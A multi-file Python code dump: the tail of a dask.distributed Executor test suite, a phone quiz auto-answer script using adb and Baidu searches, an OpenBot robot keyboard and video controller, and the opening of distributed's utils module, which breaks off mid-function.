Executor((c.ip, c.port), start=False, loop=loop) yield e1._start() assert isinstance(e1.center, rpc) assert isinstance(e1.scheduler, Scheduler) s = Scheduler((c.ip, c.port)) yield s.sync_center() done = s.start(0) e2 = Executor(s, start=False, loop=loop) yield e2._start() assert isinstance(e2.center, rpc) assert isinstance(e2.scheduler, Scheduler) s.listen(8042) e3 = Executor(('127.0.0.1', s.port), start=False, loop=loop) yield e3._start() assert isinstance(e3.center, rpc) assert isinstance(e3.scheduler, rpc) s.stop() yield e1._shutdown() yield e2._shutdown() yield e3._shutdown() _test_cluster(f, loop) @gen_cluster() def test_remote_scatter_gather(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y, z = yield e._scatter([1, 2, 3]) assert x.key in a.data or x.key in b.data assert y.key in a.data or y.key in b.data assert z.key in a.data or z.key in b.data xx, yy, zz = yield e._gather([x, y, z]) assert (xx, yy, zz) == (1, 2, 3) yield e._shutdown() @gen_cluster(timeout=1000) def test_remote_submit_on_Future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(lambda x: x + 1, 1) y = e.submit(lambda x: x + 1, x) result = yield y._result() assert result == 3 yield e._shutdown() def test_start_is_idempotent(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: e.start() e.start() e.start() x = e.submit(inc, 1) assert x.result() == 2 def test_executor_with_scheduler(loop): @gen.coroutine def f(s, a, b): assert s.ncores == {a.address: a.ncores, b.address: b.ncores} e = Executor(('127.0.0.1', s.port), start=False, loop=loop) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y) result = yield x._result() assert result == 1 + 1 a, b, c = yield e._scatter([1, 2, 3]) aa, bb, xx = yield e._gather([a, b, x]) assert (aa, bb, xx) == (1, 2, 2) result = yield e._get({'x': (inc, 1), 'y': (add, 'x', 10)}, 'y') assert result == 12 yield e._shutdown() _test_scheduler(f) @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_allow_restrictions(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1, workers=a.ip) yield x._result() assert s.who_has[x.key] == {a.address} assert not s.loose_restrictions x = e.submit(inc, 2, workers=a.ip, allow_other_workers=True) yield x._result() assert s.who_has[x.key] == {a.address} assert x.key in s.loose_restrictions L = e.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True) yield _wait(L) assert all(s.who_has[f.key] == {a.address} for f in L) assert {f.key for f in L}.issubset(s.loose_restrictions) """ x = e.submit(inc, 14, workers='127.0.0.3') with ignoring(gen.TimeoutError): yield gen.with_timeout(timedelta(seconds=0.1), x._result()) assert False assert not s.who_has[x.key] assert x.key not in s.loose_restrictions """ x = e.submit(inc, 15, workers='127.0.0.3', allow_other_workers=True) yield x._result() assert s.who_has[x.key] assert x.key in s.loose_restrictions L = e.map(inc, range(15, 25), workers='127.0.0.3', allow_other_workers=True) yield _wait(L) assert all(s.who_has[f.key] for f in L) assert {f.key for f in L}.issubset(s.loose_restrictions) with pytest.raises(ValueError): e.submit(inc, 1, allow_other_workers=True) with pytest.raises(ValueError): e.map(inc, [1], allow_other_workers=True) with pytest.raises(TypeError): e.submit(inc, 20, workers='127.0.0.1', allow_other_workers='Hello!') with pytest.raises(TypeError): 
e.map(inc, [20], workers='127.0.0.1', allow_other_workers='Hello!') yield e._shutdown() @pytest.mark.skipif('True', reason='because') def test_bad_address(): try: Executor('123.123.123.123:1234', timeout=0.1) except (IOError, gen.TimeoutError) as e: assert "connect" in str(e).lower() try: Executor('127.0.0.1:1234', timeout=0.1) except (IOError, gen.TimeoutError) as e: assert "connect" in str(e).lower() @gen_cluster() def test_long_error(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def bad(x): raise ValueError('a' * 100000) x = e.submit(bad, 10) try: yield x._result() except ValueError as e: assert len(str(e)) < 100000 tb = yield x._traceback() assert all(len(line) < 100000 for line in concat(traceback.extract_tb(tb)) if isinstance(line, str)) @gen_cluster() def test_map_on_futures_with_kwargs(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def f(x, y=10): return x + y futures = e.map(inc, range(10)) futures2 = e.map(f, futures, y=20) results = yield e._gather(futures2) assert results == [i + 1 + 20 for i in range(10)] future = e.submit(inc, 100) future2 = e.submit(f, future, y=200) result = yield future2._result() assert result == 100 + 1 + 200 yield e._shutdown() @gen_cluster(Worker=Nanny, timeout=60) def test_failed_worker_without_warning(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(inc, range(10)) yield _wait(L) ncores1 = s.ncores.copy() a.process.terminate() start = time() while not a.process.is_alive(): yield gen.sleep(0.01) assert time() - start < 10 yield gen.sleep(0.5) start = time() while len(s.ncores) < 2: yield gen.sleep(0.01) assert time() - start < 10 yield _wait(L) L2 = e.map(inc, range(10, 20)) yield _wait(L2) assert all(len(keys) > 0 for keys in s.has_what.values()) ncores2 = s.ncores.copy() yield e._restart() L = e.map(inc, range(10)) yield _wait(L) assert all(len(keys) > 0 for keys in s.has_what.values()) assert not (set(ncores2) & set(s.ncores)) # no overlap class BadlySerializedObject(object): def __getstate__(self): return 1 def __setstate__(self, state): raise TypeError("hello!") class FatallySerializedObject(object): def __getstate__(self): return 1 def __setstate__(self, state): print("This should never have been deserialized, closing") import sys sys.exit(0) @gen_cluster() def test_badly_serialized_input(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() o = BadlySerializedObject() future = e.submit(inc, o) futures = e.map(inc, range(10)) L = yield e._gather(futures) assert list(L) == list(map(inc, range(10))) yield e._shutdown() @pytest.mark.xfail def test_badly_serialized_input_stderr(capsys): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: o = BadlySerializedObject() future = e.submit(inc, o) start = time() while True: sleep(0.01) out, err = capsys.readouterr() if 'hello!' 
in err: break assert time() - start < 20 @gen_cluster() def test_repr(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert s.ip in str(e) assert str(s.port) in repr(e) yield e._shutdown() @gen_cluster() def test_forget_simple(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True) yield _wait([x, y, z]) assert not s.waiting_data[x.key] assert not s.waiting_data[y.key] assert set(s.tasks) == {x.key, y.key, z.key} s.client_releases_keys(keys=[x.key], client=e.id) assert x.key in s.tasks s.client_releases_keys(keys=[z.key], client=e.id) for coll in [s.tasks, s.dependencies, s.dependents, s.waiting, s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions, s.in_play, s.keyorder, s.exceptions, s.who_wants, s.exceptions_blame]: assert x.key not in coll assert z.key not in coll assert z.key not in s.dependents[y.key] s.client_releases_keys(keys=[y.key], client=e.id) assert not s.tasks yield e._shutdown() @gen_cluster() def test_forget_complex(s, A, B): e = Executor((s.ip, s.port), start=False) yield e._start() a, b, c, d = yield e._scatter(list(range(4))) ab = e.submit(add, a, b) cd = e.submit(add, c, d) ac = e.submit(add, a, c) acab = e.submit(add, ac, ab) yield _wait([a,b,c,d,ab,ac,cd,acab]) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[ab.key], client=e.id) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[b.key], client=e.id) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[acab.key], client=e.id) assert set(s.tasks) == {f.key for f in [ac,cd]} assert b.key not in s.who_has start = time() while b.key in A.data or b.key in B.data: yield gen.sleep(0.01) assert time() < start + 10 s.client_releases_keys(keys=[ac.key], client=e.id) assert set(s.tasks) == {f.key for f in [cd]} yield e._shutdown() def test_repr_sync(loop): with cluster(nworkers=3) as (s, [a, b, c]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: s = str(e) r = repr(e) assert e.scheduler.ip in s assert str(e.scheduler.port) in r assert str(3) in s # nworkers assert 'threads' in s @gen_cluster() def test_waiting_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True) yield _wait([x, y, z]) assert x.key not in s.waiting_data[x.key] assert y.key not in s.waiting_data[y.key] assert not s.waiting_data[x.key] assert not s.waiting_data[y.key] yield e._shutdown() @gen_cluster() def test_multi_executor(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() assert set(s.streams) == {e.id, f.id} x = e.submit(inc, 1) y = f.submit(inc, 2) y2 = e.submit(inc, 2) assert y.key == y2.key yield _wait([x, y]) assert s.wants_what == {e.id: {x.key, y.key}, f.id: {y.key}} assert s.who_wants == {x.key: {e.id}, y.key: {e.id, f.id}} yield e._shutdown() start = time() while e.id in s.wants_what: yield gen.sleep(0.01) assert time() < start + 5 assert e.id not in s.wants_what assert e.id not in s.who_wants[y.key] assert x.key not in s.who_wants yield f._shutdown() assert not s.tasks @gen_cluster() def test_cleanup_after_broken_executor_connection(s, a, b): def f(ip, port): e = Executor((ip, port)) x = e.submit(lambda x: x + 1, 10) x.result() sleep(100) proc = Process(target=f, args=(s.ip, s.port)) 
proc.daemon = True proc.start() start = time() while not s.tasks: yield gen.sleep(0.01) assert time() < start + 5 proc.terminate() start = time() while s.tasks: yield gen.sleep(0.01) assert time() < start + 5 @gen_cluster() def test_multi_garbage_collection(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() x = e.submit(inc, 1) y = f.submit(inc, 2) y2 = e.submit(inc, 2) assert y.key == y2.key yield _wait([x, y]) x.__del__() start = time() while x.key in a.data or x.key in b.data: yield gen.sleep(0.01) assert time() < start + 5 assert s.wants_what == {e.id: {y.key}, f.id: {y.key}} assert s.who_wants == {y.key: {e.id, f.id}} y.__del__() start = time() while x.key in s.wants_what[f.id]: yield gen.sleep(0.01) assert time() < start + 5 yield gen.sleep(0.1) assert y.key in a.data or y.key in b.data assert s.wants_what == {e.id: {y.key}, f.id: set()} assert s.who_wants == {y.key: {e.id}} y2.__del__() start = time() while y.key in a.data or y.key in b.data: yield gen.sleep(0.01) assert time() < start + 5 assert not any(v for v in s.wants_what.values()) assert not s.who_wants yield e._shutdown() yield f._shutdown() @gen_cluster() def test__broadcast(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y = yield e._scatter([1, 2], broadcast=True) assert a.data == b.data == {x.key: 1, y.key: 2} yield e._shutdown() def test_broadcast(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x, y = e.scatter([1, 2], broadcast=True) has_what = sync(e.loop, e.scheduler.has_what) assert has_what == {('127.0.0.1', a['port']): {x.key, y.key}, ('127.0.0.1', b['port']): {x.key, y.key}} [z] = e.scatter([3], broadcast=True, workers=[('127.0.0.1', a['port'])]) has_what = sync(e.loop, e.scheduler.has_what) assert has_what == {('127.0.0.1', a['port']): {x.key, y.key, z.key}, ('127.0.0.1', b['port']): {x.key, y.key}} @gen_cluster() def test__cancel(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(slowinc, 1) y = e.submit(slowinc, x) while y.key not in s.tasks: yield gen.sleep(0.01) yield e._cancel([x], block=True) assert x.cancelled() assert 'cancel' in str(x) s.validate() start = time() while not y.cancelled(): yield gen.sleep(0.01) assert time() < start + 5 assert not s.tasks s.validate() yield e._shutdown() @gen_cluster() def test__cancel_multi_client(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() x = e.submit(slowinc, 1) y = f.submit(slowinc, 1) assert x.key == y.key yield e._cancel([x], block=True) assert x.cancelled() assert not y.cancelled() assert y.key in s.tasks out = yield y._result() assert out == 2 with pytest.raises(CancelledError): yield x._result() yield e._shutdown() yield f._shutdown() @gen_cluster() def test__cancel_collection(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() import dask.bag as db L = e.map(double, [[1], [2], [3]]) x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3) yield e._cancel(x) yield e._cancel([x]) assert all(f.cancelled() for f in L) assert not s.tasks yield e._shutdown() def test_cancel(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(slowinc, 1) y = e.submit(slowinc, x) z = e.submit(slowinc, y) e.cancel([y], block=True) start = time() while not z.cancelled(): sleep(0.01) assert time() < start + 5 assert x.result() == 2 z.cancel(block=True) 
assert z.cancelled() @gen_cluster() def test_future_type(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) yield _wait([x]) assert x.type == int assert 'int' in str(x) yield e._shutdown() @gen_cluster() def test_traceback_clean(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) try: yield x._result() except Exception as e: f = e exc_type, exc_value, tb = sys.exc_info() while tb: assert 'scheduler' not in tb.tb_frame.f_code.co_filename assert 'worker' not in tb.tb_frame.f_code.co_filename tb = tb.tb_next @gen_cluster() def test_map_queue(s, a, b): from distributed.compatibility import Queue, isqueue e = Executor((s.ip, s.port), start=False) yield e._start() q_1 = Queue(maxsize=2) q_2 = e.map(inc, q_1) assert isqueue(q_2) q_3 = e.map(double, q_2) assert isqueue(q_3) q_4 = yield e._gather(q_3) assert isqueue(q_4) q_1.put(1) f = q_4.get() assert isinstance(f, Future) result = yield f._result() assert result == (1 + 1) * 2 yield e._shutdown() @gen_cluster() def test_map_iterator(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = iter([1, 2, 3]) y = iter([10, 20, 30]) f1 = e.map(add, x, y) assert isinstance(f1, Iterator) start = time() # ensure that we compute eagerly while not s.tasks: yield gen.sleep(0.01) assert time() < start + 5 f2 = e.map(double, f1) assert isinstance(f2, Iterator) future = next(f2) result = yield future._result() assert result == (1 + 10) * 2 yield e._shutdown() @gen_cluster() def test_map_infinite_iterators(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() futures = e.map(add, [1, 2], itertools.repeat(10)) assert len(futures) == 2 @gen_cluster() def test_map_differnet_lengths(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert len(e.map(add, [1, 2], [1, 2, 3])) == 2 def test_Future_exception_sync(loop, capsys): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: ensure_default_get(e) ensure_default_get(e) ensure_default_get(e) ensure_default_get(e) out, err = capsys.readouterr() assert len(out.strip().split('\n')) == 1 assert _globals['get'] == e.get @gen_cluster(timeout=1000) def test_async_persist(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() from dask.imperative import do, value, Value x = value(1) y = do(inc)(x) z = do(dec)(x) w = do(add)(y, z) yy, ww = e.persist([y, w]) assert type(yy) == type(y) assert type(ww) == type(w) assert len(yy.dask) == 1 assert len(ww.dask) == 1 assert len(w.dask) > 1 assert y._keys() == yy._keys() assert w._keys() == ww._keys() while y.key not in s.tasks and w.key not in s.tasks: yield gen.sleep(0.01) assert s.who_wants[y.key] == {e.id} assert s.who_wants[w.key] == {e.id} yyf, wwf = e.compute([yy, ww]) yyy, www = yield e._gather([yyf, wwf]) assert yyy == inc(1) assert www == add(inc(1), dec(1)) assert isinstance(e.persist(y), Value) assert isinstance(e.persist([y]), (list, tuple)) yield e._shutdown() def test_persist(loop): pytest.importorskip('dask.array') import dask.array as da with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = da.ones((10, 10), chunks=(5, 10)) y = 2 * (x + 1) assert len(y.dask) == 6 yy = e.persist(y) assert len(y.dask) == 6 assert len(yy.dask) == 2 assert all(isinstance(v, Future) for v in yy.dask.values()) assert (yy.compute(get=e.get) == y.compute(get=e.get)).all() @gen_cluster(timeout=60) def test_long_traceback(s, a, b): from distributed.core import dumps e = 
Executor((s.ip, s.port), start=False) yield e._start() n = sys.getrecursionlimit() sys.setrecursionlimit(500) try: x = e.submit(deep, 1000) yield _wait([x]) assert len(dumps(e.futures[x.key]['traceback'])) < 10000 assert isinstance(e.futures[x.key]['exception'], RuntimeError) finally: sys.setrecursionlimit(n) yield e._shutdown() @gen_cluster() def test_wait_on_collections(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() import dask.bag as db L = e.map(double, [[1], [2], [3]]) x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3) yield _wait(x) assert all(f.key in a.data or f.key in b.data for f in L) yield e._shutdown() def test_futures_of(): x, y, z = map(WrappedKey, 'xyz') assert futures_of(0) == [] assert futures_of(x) == [x] assert futures_of([x, y, z]) == [x, y, z] assert futures_of([x, [y], [[z]]]) == [x, y, z] import dask.bag as db b = db.Bag({('b', i): f for i, f in enumerate([x, y, z])}, 'b', 3) assert set(futures_of(b)) == {x, y, z} @gen_cluster(ncores=[('127.0.0.1', 1)]) def test_dont_delete_recomputed_results(s, w): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) # compute first time yield _wait([x]) x.__del__() # trigger garbage collection xx = e.submit(inc, 1) # compute second time start = time() while xx.key not in w.data: # data shows up yield gen.sleep(0.01) assert time() < start + 1 while time() < start + (s.delete_interval + 100) / 1000: # and stays assert xx.key in w.data yield gen.sleep(0.01) yield e._shutdown() @gen_cluster(ncores=[]) def test_fatally_serialized_input(s): e = Executor((s.ip, s.port), start=False) yield e._start() o = FatallySerializedObject() future = e.submit(inc, o) while not s.tasks: yield gen.sleep(0.01) yield e._shutdown()
main.py
#!/usr/bin/env python # -*- coding:utf-8 -*- ''' @file: main.py @author: kessil @contact: https://github.com/kessil/ @time: 2019年06月02日 15:58:23 @desc: Life is short, you need Python ''' from time import sleep from adble import pull_xml, tap_screen from model import Base, engine, Session,Bank, db_add, db_qeury import requests import string from urllib.parse import quote from config import Config import re from playsound import playsound import threading from random import randint filename = Config.XML_URI question = None Base.metadata.create_all(engine) session = Session() def attention(filename='attention.mp3', repeat=Config.REPEAT_TIMES): '''语音提示:https://developer.baidu.com/vcast导出音频''' for i in range(repeat): playsound('./sounds/%s'%filename) def search(question): '''搜索引擎检索题目''' content = re.sub(r'[\((]出题单位.*', "", question.content) url = quote('https://www.baidu.com/s?wd=' + content, safe=string.printable) headers = Config.HEADERS response = requests.get(url, headers=headers).text if question.item1: print('A. %s: %d'%(question.item1, response.count(question.item1))) if question.item2: print('B. %s: %d'%(question.item2, response.count(question.item2))) if question.item3: print('C. %s: %d'%(question.item3, response.count(question.item3))) if question.item4: print('D. %s: %d'%(question.item4, response.count(question.item4))) print('%s\n请先在手机提交答案,根据提交结果输入答案!'%('-'*min(len(question.content)*2, 120))) def run(session, num=float('inf')): # t= threading.Thread(target=attention)#创建线程 # t.setDaemon(True)#设置为后台线程,这里默认是False,设置为True之后则主线程不用等待子线程 while num: num = num - 1 pull_xml(filename) sleep(1) question = Bank.from_xml(filename) print('\n%s\n%s'%('-'*min(len(question.content)*2, 120), question.content)) bank = db_qeury(session, content=question.content) delay = 1 # randint(3,5) if bank: index = ord(bank.answer)-65 pos = complex(question.bounds.split(' ')[index]) if question.item1: print('A. %s'%question.item1) if question.item2: print('B. %s'%question.item2) if question.item3: print('C. %s'%question.item3) if question.item4: print('D. %s'%question.item4) print(f"\n {delay} 秒自动提交答案: {bank.answer}\n") if 0j == pos: t= threading.Thread(target=attention, args=('crossed.mp3',1))#创建线程 t.start() sleep(5) continue else: sleep(delay) tap_screen(int(pos.real), int(pos.imag)) else: t= threading.Thread(target=attention, args=('doubt.mp3',2))#创建线程 t.start() search(question) ch = input('请输入:').upper() if ch and 'N' == ch: break if ch and ch in "ABCD": question.answer = ch db_add(session, question) if __name__ == "__main__": run(session,842)
keyboard-pygame.py
import pygame from pygame.locals import * import cv2 # pip3 install opencv-python import os import threading import json from common import * import argparse s_socket = ServerSocket() white = (255, 255, 255) black = (0, 0, 0) blue = (0, 0, 128) red = (200, 0, 0) class CommandHandler: def __init__(self): pygame.key.set_repeat(200) left = DriveValue() right = DriveValue() def send_command(self, command): s_socket.send('{{command: {command} }}\n'.format(command=command)) def send_drive_command(self, left, right): s_socket.send('{{driveCmd: {{l:{l}, r:{r} }} }}\n'.format(l=left, r=right)) def reset(self): self.send_drive_command(self.left.reset(), self.right.reset()) def forward_left(self): self.send_drive_command(self.left.write(0.75), self.right.max()) def forward_right(self): self.send_drive_command(self.left.max(), self.right.write(0.75)) def backward_left(self): self.send_drive_command(self.left.min(), self.right.write(-0.75)) def backward_right(self): self.send_drive_command(self.left.write(-0.75), self.right.min()) def rotate_left(self): self.send_drive_command(self.left.min(), self.right.max()) def rotate_right(self): self.send_drive_command(self.left.max(), self.right.min()) def go_forward(self): self.send_drive_command(self.left.max(), self.right.max()) def go_backward(self): self.send_drive_command(self.left.min(), self.right.min()) def handle_keys(self): while True: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.KEYUP: if event.key==K_w: self.reset() elif event.key in [K_a, K_d, K_q, K_e]: if(pygame.key.get_pressed()[pygame.K_w]): self.go_forward() elif(pygame.key.get_pressed()[pygame.K_s]): self.go_backward() else: self.reset() elif event.key==K_s: self.reset() if event.type == pygame.KEYDOWN: if event.key==K_w: self.go_forward() elif event.key==K_s: self.go_backward() elif event.key==K_a: if(pygame.key.get_pressed()[pygame.K_w]): self.forward_left() elif(pygame.key.get_pressed()[pygame.K_s]): self.backward_left() elif event.key==K_d: if(pygame.key.get_pressed()[pygame.K_w]): self.forward_right() elif(pygame.key.get_pressed()[pygame.K_s]): self.backward_right() elif event.key==K_q: self.rotate_left() elif event.key==K_e: self.rotate_right() if event.key==pygame.K_n: self.send_command("NOISE") if event.key==pygame.K_SPACE: self.send_command("LOGS") if event.key==pygame.K_RIGHT: self.send_command("INDICATOR_RIGHT") if event.key==pygame.K_LEFT: self.send_command("INDICATOR_LEFT") if event.key==pygame.K_UP: self.send_command("INDICATOR_STOP") if event.key==pygame.K_DOWN: self.send_command("NETWORK") if event.key==pygame.K_m: self.send_command("DRIVE_MODE") if event.key==pygame.K_ESCAPE: return (zc, info) = register("OPEN_BOT_CONTROLLER", 19400) class VideoPlayer: def set_stream (self, stream): self.stream = stream def play_video(self): if not self.stream: print(f'Sream not set') return print(f'Opening the stream...') cap = cv2.VideoCapture(self.stream) # read one frame and check if there was no problem print(f'Checking the stream...') ret, img = cap.read() if not ret: print("Can't read stream") cap.release() cv2.destroyAllWindows() return img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #img = cv2.flip(img, 1) img = cv2.transpose(img) # display its width, height, color_depth print('Stream resolution:', img.shape) shape = img.shape width = img.shape[0] height = img.shape[1] display_flags = DOUBLEBUF | HWSURFACE # | SCALED if pygame.display.mode_ok(size=(width, height), flags=display_flags ): video_screen = 
pygame.display.set_mode(size=(width, height), flags=display_flags) else: raise ValueError("error initializing display, can not get mode") print (f'Display: {pygame.display.Info()}') running = True while running: # read one frame and check if there was no problem ret, img = cap.read() if not ret: running = False cap.release() cv2.destroyAllWindows() break else: img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.transpose(img) # blit directly on screen pygame.surfarray.blit_array(video_screen, img) pygame.display.flip() def stop_video(self): print(f'Stopping video...') pass def usage(): usageStr = """ Make sure to keep the pygame window in focus!\r Use the following keys to drive the robot:\r \tW: Go forward\r \tS: Go backward\r \tA: Turn slightly left (while driving)\r \tD: Turn slightly right (while driving)\r \tQ: Rotate left\r \tE: Rotate right\r \tM: Drive mode\r \tN: Toggle noise\r \tLeft: Left indicator\r \tRight: Right indicator\r \tUp: Cancel indicators\r \tDown: Network mode\r \tSPACE: Toggle logging\r \tESC: Quit\r """ return usageStr def run_receiver (): while True: try: data = s_socket.receive() print(f'Received: {data}\r') if data in ["", None]: return handle_status(data) except Exception as e: print(f'run_receiver: Got exception: {e}\r') break video_player = VideoPlayer() def handle_status(data): parsed_data = json.loads(data) if not 'status' in parsed_data: return status = parsed_data['status'] try: if 'VIDEO_SERVER_URL' in status: stream = status ['VIDEO_SERVER_URL'] video_player.set_stream(stream) if 'VIDEO_COMMAND' in status: if status['VIDEO_COMMAND'] == 'START': print(f'Starting video...') video_player.play_video() if status['VIDEO_COMMAND'] == 'STOP': video_player.stop_video() except Exception as e: print (f"handle_status exception: {e}") def setup_screen (): pygame.display.set_caption('OpenBot keyboard controller') font = pygame.font.Font(None, 32) #Use system font screen = pygame.display.set_mode([1280, 720]) screen.fill(white) text = usage() print(text) lines = text.strip().split('\r') x_pos = 50 y_pos = 50 delimiter=':' for line in lines: # create a text suface object if delimiter in line: space = ' ' if '\t' in line else '' elements = line.strip().split(delimiter) text = font.render(space + elements[0].strip() + delimiter, True, blue) screen.blit(text, (x_pos, y_pos)) text = font.render(elements[1].strip(), True, black) screen.blit(text, (x_pos+200, y_pos)) else: text = font.render(line, True, red) screen.blit(text, (x_pos, y_pos)) pygame.display.update() y_pos=y_pos+40 def run(args): os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp" print('Waiting for connection...\r\n') s_socket.accept() print('Connected! 😃\n\r') pygame.init() setup_screen() if (args.video): t = threading.Thread(target=run_receiver) t.start() cmd_handler = CommandHandler () cmd_handler.handle_keys () s_socket.close() zc.unregister_service(info) zc.close() print('Exiting...\r\n') if __name__ == "__main__": # cli parser = argparse.ArgumentParser() parser.add_argument("-v", "--video", action="store_true", help="video stream") args = parser.parse_args() run (args)
utils.py
import asyncio from asyncio import TimeoutError import atexit import click from collections import deque, OrderedDict, UserDict from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401 from contextlib import contextmanager, suppress import functools from hashlib import md5 import html import json import logging import multiprocessing import os import re import shutil import socket from time import sleep import importlib from importlib.util import cache_from_source import inspect import sys import tempfile import threading import warnings import weakref import pkgutil import base64 import tblib.pickling_support import xml.etree.ElementTree try: import resource except ImportError: resource = None import dask from dask import istask # provide format_bytes here for backwards compatibility from dask.utils import ( # noqa format_bytes, funcname, format_time, parse_bytes, parse_timedelta, ) import tlz as toolz from tornado import gen from tornado.ioloop import IOLoop try: from tornado.ioloop import PollIOLoop except ImportError: PollIOLoop = None # dropped in tornado 6.0 from .compatibility import PYPY, WINDOWS, get_running_loop from .metrics import time try: from dask.context import thread_state except ImportError: thread_state = threading.local() # For some reason this is required in python >= 3.9 if WINDOWS: import multiprocessing.popen_spawn_win32 else: import multiprocessing.popen_spawn_posix logger = _logger = logging.getLogger(__name__) no_default = "__no_default__" def _initialize_mp_context(): if WINDOWS or PYPY: return multiprocessing else: method = dask.config.get("distributed.worker.multiprocessing-method") ctx = multiprocessing.get_context(method) # Makes the test suite much faster preload = ["distributed"] if "pkg_resources" in sys.modules: preload.append("pkg_resources") from .versions import required_packages, optional_packages for pkg, _ in required_packages + optional_packages: try: importlib.import_module(pkg) except ImportError: pass else: preload.append(pkg) ctx.set_forkserver_preload(preload) return ctx mp_context = _initialize_mp_context() def has_arg(func, argname): """ Whether the function takes an argument with the given name. """ while True: try: if argname in inspect.getfullargspec(func).args: return True except TypeError: break try: # For Tornado coroutines and other decorated functions func = func.__wrapped__ except AttributeError: break return False def get_fileno_limit(): """ Get the maximum number of open files per process. """ if resource is not None: return resource.getrlimit(resource.RLIMIT_NOFILE)[0] else: # Default ceiling for Windows when using the CRT, though it # is settable using _setmaxstdio(). return 512 @toolz.memoize def _get_ip(host, port, family): # By using a UDP socket, we don't actually try to connect but # simply select the local address through which *host* is reachable. sock = socket.socket(family, socket.SOCK_DGRAM) try: sock.connect((host, port)) ip = sock.getsockname()[0] return ip except EnvironmentError as e: warnings.warn( "Couldn't detect a suitable IP address for " "reaching %r, defaulting to hostname: %s" % (host, e), RuntimeWarning, ) addr_info = socket.getaddrinfo( socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP )[0] return addr_info[4][0] finally: sock.close() def get_ip(host="8.8.8.8", port=80): """ Get the local IP address through which the *host* is reachable. *host* defaults to a well-known Internet host (one of Google's public DNS servers). 
""" return _get_ip(host, port, family=socket.AF_INET) def get_ipv6(host="2001:4860:4860::8888", port=80): """ The same as get_ip(), but for IPv6. """ return _get_ip(host, port, family=socket.AF_INET6) def get_ip_interface(ifname): """ Get the local IPv4 address of a network interface. KeyError is raised if the interface doesn't exist. ValueError is raised if the interface does no have an IPv4 address associated with it. """ import psutil net_if_addrs = psutil.net_if_addrs() if ifname not in net_if_addrs: allowed_ifnames = list(net_if_addrs.keys()) raise ValueError( "{!r} is not a valid network interface. " "Valid network interfaces are: {}".format(ifname, allowed_ifnames) ) for info in net_if_addrs[ifname]: if info.family == socket.AF_INET: return info.address raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,)) # FIXME: this breaks if changed to async def... @gen.coroutine def ignore_exceptions(coroutines, *exceptions): """Process list of coroutines, ignoring certain exceptions >>> coroutines = [cor(...) for ...] # doctest: +SKIP >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP """ wait_iterator = gen.WaitIterator(*coroutines) results = [] while not wait_iterator.done(): with suppress(*exceptions): result = yield wait_iterator.next() results.append(result) raise gen.Return(results) async def All(args, quiet_exceptions=()): """Wait on many tasks at the same time Err once any of the tasks err. See https://github.com/tornadoweb/tornado/issues/1546 Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some 